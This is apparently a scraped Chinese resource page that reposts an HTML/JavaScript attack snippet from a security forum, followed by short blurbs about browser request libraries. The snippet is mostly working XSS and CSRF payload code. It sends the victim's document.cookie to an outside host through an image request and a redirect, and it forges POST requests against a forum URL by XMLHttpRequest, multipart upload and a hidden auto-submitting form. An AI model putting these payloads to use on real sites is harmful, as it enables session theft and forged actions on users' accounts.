from http://www.3g-sec.com/thread-1399-1-1.html
<html>
<head>
<script>
//第一种GET方式
new Image().src="http://www.3g-sec.com/forum.php?cookie="+escape(document.cookie);
//第二种GET方式
location.href="http://www.3g-sec.com/forum.php?cookie="+escape(document.cookie);
//第一种POST方式(XMLHttpRequest普通POST)
xhr=function(){
var request = false;
if(window.XMLHttpRequest){
request = new XMLHttpRequest();
}else if (window.ActiveXObject){
try{
request = new window.ActiveXObject('Microsoft.XMLHTTP');
}catch(e){
}
}
return request;
}();
request = function(method,src,argv,content_type){
xhr.open(method,src,false);//同步方式,异步把false改为true
if(method=='POST')xhr.setRequestHeader('Content-type',content_type);
//设置表单的content-type类型,常见的是application/x-www-form-urlencoded
//如果是文件上传的表单则content-type为multipart/form-data第二个例子中会有
xhr.send(argv);//发送POST数据
return xhr.responseText;//返回响应的内容
};
attack_a = function(){
var src = "http://www.dzx2.com/forum.php";
var argv_0 = "&name1=value1&name2=value2";
request("POST",src,argv_0,"application/x-www-form-urlencoded");
};
attack_a();
//第二种POST方式(XMLHttpRequest文件上传POST)
xhr=function(){
var request = false;
if(window.XMLHttpRequest){
request = new XMLHttpRequest();
}else if (window.ActiveXObject){
try{
request = new window.ActiveXObject('Microsoft.XMLHTTP');
}catch(e){
}
}
return request;
}();
request = function(method,src,argv,content_type){
xhr.open(method,src,false);
if(method=='POST')xhr.setRequestHeader('Content-type',content_type);
xhr.send(argv);
return xhr.responseText;
};
attack_a = function(){
var src = "http://www.dzx2.com/forum.php";
var name1 = "value1";
var name2 = "value2";
var argv_0 = "\r\n";
argv_0 +="---------------------7964f8dddeb95fc5\r\nContent-Disposition:form-data;name=\"name1\"\r\n\r\n";
argv_0 +=(name1+"\r\n");
argv_0 +="---------------------7964f8dddeb95fc5\r\nContent-Disposition:form-data;name=\"name2\"\r\n\r\n";
argv_0 +=(name2+"\r\n");
argv_0 +="---------------------7964f8dddeb95fc5\r\n";
/*
POST提交的参数是以---------------------7964f8dddeb95fc5分割的
下面设置表单提交的Content-Type与form-data分隔边界为:
multipart/form-data;boundary=---------------------7964f8dddeb95fc5
*/
request("POST",src,argv_0,"multipart/form-data;boundary=---------------------7964f8dddeb95fc5");
}
attack_a();
//第三种POST方式(javascript实现表单自提交)
function new_form(){
var f = document.createElement("form");
document.body.appendChild(f);
f.method = "post";
return f;
}
function create_elements(eForm,eName,eValue){
var e=document.createElement("input");
eForm.appendChild(e);
e.type='text';
e.name=eName;
if(!document.all){
e.style.display='none';
}else{
e.style.display='block';
e.style.width='0px';
e.style.height='0px';
}
e.value=eValue;
return e;
}
var _f=new_form();//创建一个form表单
create_elements(_f,"name1","value1");//创建form中的input对象
create_elements(_f,"name2","value2");
_f.action="http://www.dzx2.com/forum.php";//form提交地址
_f.submit();//提交
</script>
</head>
<body>
</body>
</html>
分享到:
相关推荐
服务端模拟ajax,支持发起GET、POST、PUT、DELETE请求
解决vue $http的get和post请求跨域问题 vue $http的get和post请求跨域问题 首先在config/index.js中配置proxyTable proxyTable: { '/api':{ // target:'http://jsonplaceholder.typicode.com', target:'...
Tampery是一种浏览器扩展,用于篡改浏览器请求。 它是可编程的,这意味着您可以编写自己的脚本来拦截,阻止或修改浏览器请求。
Modernizr:一个JavaScript库,检测用户浏览器HTML5和CSS3功能
javascript获取浏览器临时目录javascript获取浏览器临时目录javascript获取浏览器临时目录javascript获取浏览器临时目录
原生javascript实现ajax发送pos请求,这样可以脱离jquery框架,
deft-request 是一个轻量级的 Javascript 浏览器请求框架,支持 Fetch,AJAX,JSONP,甚至支持自定义的请求方式。 使用非常简单 统一各种请求方式的参数
js实现发起表单请求,post请求,参考案例,可自行按需修改js实现发起表单请求,post请求,参考案例,可自行按需修改js实现发起表单请求,post请求,参考案例,可自行按需修改js实现发起表单请求,post请求,参考案例...
这是一个JavaScript获取浏览器参数的方法,
1:请求需要的参数过长,超过get允许的最大长度 2:想要隐藏地址栏的参数 //新创建一个form表单 [removed]('<form name=myForm></form>'); var myForm=document.forms['myForm']; myForm.action='...
模拟POST工具 Postman的客户端,windows 64位版 postman-win64-6.6.1-Setup.exe, 这是postman插件的客户端版,用来模拟post、get请求,使用更方法,不依赖于浏览器,windows下安装后直接使用。
篡改篡改是浏览器扩展,用于篡改飞行中的浏览器请求。 它是可编程的,这意味着您可以编写自己的脚本来拦截,阻止或修改浏览器请求。 安装安装i Tampery Tampery是浏览器扩展,用于篡改飞行中的浏览器请求。 它是可...
JavaScript 获取浏览器的显示区域大小信息.txt JavaScript 获取浏览器的显示区域大小信息.txt JavaScript 获取浏览器的显示区域大小信息.txt JavaScript 获取浏览器的显示区域大小信息.txt
通过Javascript代码判断运行浏览器的类型,不需要依赖其它的包纯净版本
JavaScript判断各种浏览器代码
浏览器出于安全考虑,是不允许JavaScript代码进行跨域操作。JavaScript 和 AJAX 跨域访问分为两大类,一是本域和子域的交互,二是本域和其他域的交互。 一、本域和子域的交互:www.s135.com 和 blog.s135.com ...
JSON数据前后传输例子,post,get请求例子,jquery
JavaScript安全_从浏览器到服务端:讲解web段如何获取信息及防止获取信息。
拦截post请求关键js代码 文章源地址: https://blog.csdn.net/weixin_40855673/article/details/121575150?spm=1001.2014.3001.5501
最近一段时间在学习前端向服务器发送数据和请求数据,下面总结了一下向服务器发送请求用get和post的几种不同请求方式: 1.用form表单的方法: (1)get方法 前端代码: <form action = /login method = GET> ...